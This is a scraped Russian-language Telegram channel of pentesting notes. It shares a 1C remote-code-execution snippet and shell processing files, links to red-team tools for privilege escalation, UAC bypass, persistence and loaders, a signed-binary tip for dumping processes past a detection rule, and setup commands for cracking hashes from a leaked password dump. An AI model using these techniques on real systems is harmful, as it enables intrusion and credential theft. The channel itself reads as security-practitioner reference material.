Pentester`s Notes – Telegram
Pentester`s Notes
@hackn0tes
186 subscribers
47 photos
2 videos
31 files
136 links
Download Telegram
About
Blog
Apps
Platform
Join
Pentester`s Notes
186 subscribers
Pentester`s Notes
Forwarded from hidden account
КомандныйИнтерпретаторДля1С.epf
13 KB
1C_RCE.epf
23.9 KB
1C-Shell.epf
10.8 KB
108 viewshidden
Pentester`s Notes
Forwarded from hidden account
Для 1с_rce нужно код вставить
89 viewshidden
Pentester`s Notes
Forwarded from Pentester`s Notes
shell=New COMObject("WScript.Shell");
e=shell.Exec("whoami");
Сообщить(e.StdOut.ReadAll());

#1c #1с #rce 1c rce
75 viewshidden
Pentester`s Notes
В ближайшее время планирую обработать исходный код этих обработок и собрать в одну универсальную, с возможностью выбора той или иной. Над реализацией ещё подумаю
78 viewshidden
Pentester`s Notes
Надо будет потестить, возможно стабильнее, чем rdp2tcp
70 viewshidden
Pentester`s Notes
Forwarded from true_security
Крутая тулза для организации socks через rdp соединение, работает практически без детектов. https://github.com/nccgroup/SocksOverRDP

Обратить внимание на строку:
#define SocksOverRDP_CHANNEL_NAME "SocksChannel"
Ну вы поняли☺️
GitHub
GitHub - nccgroup/SocksOverRDP: Socks5/4/4a Proxy support for Remote Desktop Protocol / Terminal Services / Citrix / XenApp / XenDesktop
Socks5/4/4a Proxy support for Remote Desktop Protocol / Terminal Services / Citrix / XenApp / XenDesktop - nccgroup/SocksOverRDP
67 viewshidden
Pentester`s Notes
Forwarded from 1N73LL1G3NC3
GTFONow

Automatic privilege escalation for misconfigured capabilities, sudo and suid binaries using GTFOBins.
58 viewshidden
Pentester`s Notes
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Чекер виндовых CVE

https://github.com/BC-SECURITY/Moriarty

* Windows 10 (1507, 1511, 1607, 1703, 1709, 1803, 1809, 1903, 1909, 2004, 20H2, 21H1, 21H2, 22H2)
* Windows 11 (21H2, 22H2)
* Windows Server 2016, 20 19, 2022


#exploit #cve #pentest #redteam #ad
GitHub
GitHub - BC-SECURITY/Moriarty: Moriarty is designed to enumerate missing KBs, detect various vulnerabilities, and suggest potential…
Moriarty is designed to enumerate missing KBs, detect various vulnerabilities, and suggest potential exploits for Privilege Escalation in Windows environments. - GitHub - BC-SECURITY/Moriarty: Mor...
57 viewshidden
Pentester`s Notes
Forwarded from Magama Bazarov
https://docs.google.com/document/d/1Cu2e-zWtOV4lCZNSLZbka5b9imcST7hNvLPxcAaENoo/edit

Лучше это почитайте, Вадим Шелест крутую матрицу написал
Google Docs
Матрица компетенций
Матрица компетенций


Позиция: Стажер (нет опыта работы) Ключевые навыки: Понимание основных принципов работы инструментов безопасности ОС (Linux/Windows) на уровне пользователя Понимание основных принципов работы и построения сетей на начальном…
69 viewshidden
Pentester`s Notes
Forwarded from true_security
Сегодня в одном чате ребята обсуждали написание статьи про Lolbins.
Вот вам один интересный lolbas - C:\Program Files (x86)\Kaspersky Lab\NetworkAgent\kldumper.exe
описание - https://support.kaspersky.ru/common/diagnostics/7641
преза от ЛК, где предлагается сигма правило с исключением данного бинаря из сработки по дампу lsass - https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf

у kldumper.exe цифровая подпись ЛК. lsass им не дампил еще, но другие процессы дампит ок (при наличии прав лок админа)
63 viewshidden
Pentester`s Notes
Forwarded from APT
👩‍💻 Writing your own RDI /sRDI loader using C and ASM

Learn the process of crafting a personalized RDI/sRDI loader in C and ASM, incorporating code optimization to achieve full position independence.

🔗 https://blog.malicious.group/writing-your-own-rdi-srdi-loader-using-c-and-asm/

#maldev #reflective #dll #clang #asm
Please open Telegram to view this post
VIEW IN TELEGRAM
Malicious Group
Writing your own RDI /sRDI loader using C and ASM
In this post, I am going to show the readers how to write their own RDI/sRDI loader in C, and then show how to optimize the code to make it fully position independent.
64 viewshidden
Pentester`s Notes
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Очень большая и полная статья про принципы работы EDR

https://sensepost.com/blog/2024/sensecon-23-from-windows-drivers-to-an-almost-fully-working-edr/

Автор даже свои модули писал чтобы лучше разобраться

https://github.com/sensepost/mydumbedr

#redteam #edr #blueteam
73 viewshidden
Pentester`s Notes
Forwarded from Offensive-SEC
The Art of Linux Persistence.pdf.pdf
6.9 MB
https://news.1rj.ru/str/offenciveSec
71 viewshidden
Pentester`s Notes
Forwarded from 👹ℤ𝕝𝕠𝕓𝕝𝕪𝕒👹
https://netacad.sadlab.su
netacad.sadlab.su
AntiNetacad
Пока Cisco приостановила деятельность в РФ, учёба продолжается.
Полностью рабочие версии курсов со всеми материалами Netacad от компании Cisco на русском и английском языках.
Для изучения доступны курсы:
Networking Essentials;
IT Essentials…
72 viewshidden
Pentester`s Notes
Forwarded from Миша
https://hadess.io/user-account-control-uncontrol-mastering-the-art-of-bypassing-windows-uac/
69 viewshidden
Pentester`s Notes
Forwarded from Offensive Xwitter
😈 [ MDSec @MDSecLabs ]

Interested in sharpening your red team AD recon? Check out our latest post by @domchell, "Active Directory Enumeration for Red Teams"

🔗 https://www.mdsec.co.uk/2024/02/active-directory-enumeration-for-red-teams/

🐥 [ tweet ]
73 viewshidden
Pentester`s Notes
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Хороший функционал

https://github.com/wh0amitz/SharpADWS

#ad #recon #redteam #pentest
GitHub
GitHub - wh0amitz/SharpADWS: Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services…
Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS). - wh0amitz/SharpADWS
79 viewshidden
Pentester`s Notes
Forwarded from Кавычка (Bo0oM)
Быстро и дешево брутим хэши

Короч, есть чуваки такие, immers.cloud

По сути это хостинг с арендой видеокарт. А так как я занимался проектом passleak.ru, иногда нужно было разгадывать хэшики, решил не покупать под это оборудование. Вышло круто.

Тут есть два варианта развития событий.

Арендуем видеокарту (какую - по желанию, они там выкатили какие-то ультра-модные H100, но мне и 2080 часто хватает), грузим туда наши хэши, делаем что-то типа:


sudo apt-get update
sudo apt-get install gcc make tmux git mesa-common-dev cmake nvidia-cuda-toolkit build-essential unzip -y
https://ru.download.nvidia.com/XFree86/Linux-x86_64/470.63.01/NVIDIA-Linux-x86_64-470.63.01.run
chmod +x NVIDIA-Linux-x86_64-470.63.01.run
sudo ./NVIDIA-Linux-x86_64-470.63.01.run


Устанавливаем hashcat и играемся с этим всем.

Но если нам нужно побрутить пароли по словарям, способ еще круче. Берем готовый образ Ubuntu + Hashcat + Weakpass 3, на диске будет лежать архив с Weakpass V3. Запускаем и прогоняем хэши, забираем то что сбрутилось, вырубаем машину.

Например, чтоб раскукожить пароли из дампа Linkedin - мне потребовалось рублей... 20?
В общем, круто держать под рукой чтобы быстро сбрутить какой-то хэшик.

>
🔥1
94 viewsAlexander
Pentester`s Notes
Атаки на Active Directory: часть 1 | DefconRU
https://defcon.ru/penetration-testing/18872/
95 viewshidden
Pentester`s Notes
Forwarded from Внутрянка
Материал про пентест 1С
Ardent101
Еще 1 раз про пентест 1С
Введение Настоящий материал по большей части состоит из общедоступных наработок других людей. Целью было проверить указанные наработки на практике и собрать получившиеся результаты в одном месте. Именно этим объясняется название статьи.
Продолжу рассуждение…
85 viewshidden